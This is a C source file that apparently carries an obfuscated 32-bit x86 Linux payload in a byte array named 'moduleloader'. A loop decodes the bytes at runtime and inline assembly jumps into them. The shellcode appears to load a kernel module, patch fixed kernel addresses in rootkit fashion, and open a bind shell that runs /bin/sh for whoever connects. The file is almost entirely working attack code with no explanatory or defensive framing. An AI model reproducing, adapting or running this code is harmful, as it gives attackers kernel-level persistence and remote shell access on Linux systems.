
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
int main (int argc, char* argv[])
{
char moduleloader[] = {


0x31, 0xc9, 0xe3, 0x02, 0xe3, 0x05, 0xe8, 0xf9, 0xff, 0xff, 0xff, 0x58,
0x83, 0xe8, 0x0b, 0x89, 0xc6, 0x31, 0xc9, 0x41, 0xd0, 0xe1, 0xd0, 0xe1,
0xd0, 0xe1, 0xd0, 0xe1, 0xd0, 0xe1, 0xd0, 0xe1, 0x01, 0xce, 0x66, 0xb9,
0xc0, 0x01, 0xfe, 0x0e, 0xfe, 0x0e, 0xfe, 0x0e, 0x46, 0x49, 0xe3, 0x05,
0xe9, 0xf1, 0xff, 0xff, 0xff, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90,


0xe8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x83, 0xeb, 0x05, 0xb8, 0x7f, 0x00,
0x00, 0x00, 0x81, 0xc3, 0x60, 0x00, 0x00, 0x00, 0x83, 0xc3, 0x48, 0xb9,
0x00, 0x01, 0x00, 0x00, 0xcd, 0x80, 0x89, 0xc2, 0x83, 0xeb, 0x48, 0xc7,
0x43, 0x00, 0x48, 0x00, 0x00, 0x00, 0xc7, 0x43, 0x0c, 0x00, 0x01, 0x00,
0x00, 0x83, 0xc2, 0x48, 0x89, 0x53, 0x08, 0x83, 0xc2, 0x08, 0x89, 0x53,
0x2c, 0xb8, 0x80, 0x00, 0x00, 0x00, 0x83, 0xc3, 0x48, 0x89, 0xd9, 0x83,
0xe9, 0x48, 0xcd, 0x80, 0x31, 0xc9, 0x0f, 0x83, 0xcc, 0x00, 0x00, 0x00,


0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,






0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,


0x6a, 0x70, 0x61, 0x62, 0x65, 0x6c, 0x00, 0x00,



    0xe8, 0x00, 0x00, 0x00, 0x00,
    0x58,
    0x83, 0xe8, 0x05,

    0x89, 0xc1,
    0x83, 0xc1, 0x60,


    0xba, 0x6c, 0x94, 0x25, 0xc0,
    0x89, 0x0a,

    0x83, 0xc1, 0x04,


    0xba, 0x64, 0x94, 0x25, 0xc0,
    0x89, 0x0a,

    0xba, 0x70, 0x94, 0x25, 0xc0,
    0x89, 0x0a,

    0x83, 0xc1, 0x01,


    0xba, 0x50, 0x94, 0x25, 0xc0,
    0x89, 0x0a,

    0xba, 0x5c, 0x94, 0x25, 0xc0,
    0x89, 0x0a,

    0xba, 0x74, 0x94, 0x25, 0xc0,
    0x89, 0x0a,

    0xba, 0x78, 0x94, 0x25, 0xc0,
    0x89, 0x0a,

    0xba, 0x7c, 0x94, 0x25, 0xc0,
    0x89, 0x0a,


    0xb8, 0x00, 0x00, 0x00, 0x00,
    0xc3,

    0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90,




    0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0xb8, 0x00, 0x00, 0x00, 0x00,
    0xc3,



0x90, 0x90, 0x90, 0x90,





  0x31, 0xc0

, 0xeb, 0x7c

, 0x59
, 0x89, 0x41, 0x10

, 0x89, 0x41, 0x08
, 0xfe, 0xc0
, 0x89, 0x41, 0x04
, 0x89, 0xc3

,0x40
, 0x89, 0x01
, 0xb0, 0x66
, 0xcd, 0x80

, 0xb3, 0x02
, 0x89, 0x59, 0x0c
, 0xc6, 0x41, 0x0e, 0x99
, 0xc6, 0x41, 0x08, 0x10
, 0x89, 0x49, 0x04
, 0x80, 0x41, 0x04, 0x0c
, 0x88, 0x01
, 0xb0, 0x66
, 0xcd, 0x80

, 0xb3, 0x04
, 0xb0, 0x66
, 0xcd, 0x80

, 0xb3, 0x05




,0x89, 0x49, 0x04
,0x89, 0x49, 0x08


, 0xb0, 0x66
, 0xcd, 0x80

, 0x89, 0xce
, 0x88, 0xc3
, 0x31, 0xc9
, 0xb0, 0x3f
, 0xcd, 0x80

, 0xfe, 0xc1
, 0xb0, 0x3f
, 0xcd, 0x80

, 0xfe, 0xc1
, 0xb0, 0x3f
, 0xcd, 0x80

, 0xc7, 0x06, 0x2f, 0x62, 0x69, 0x6e
, 0xc7, 0x46, 0x04, 0x2f, 0x73, 0x68, 0x41
, 0x30, 0xc0
, 0x88, 0x46, 0x07
, 0x89, 0x76, 0x0c
, 0x8d, 0x56, 0x10
, 0x8d, 0x4e, 0x0c
, 0x89, 0xf3
, 0xb0, 0x0b
, 0xcd, 0x80

, 0xb0, 0x01
, 0xcd, 0x80

, 0xe8, 0x7f, 0xff, 0xff, 0xff,



0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90
};
char* pointer;




{
int i;
for(i=64;i<512;i++)
 moduleloader[i] = moduleloader[i]+3;
}

pointer = &moduleloader[0];
asm volatile ("movl %ebp, %eax");
asm volatile ("subl $520, %eax");
asm volatile ("pushl %eax");
asm volatile ("ret");

return 0;
}
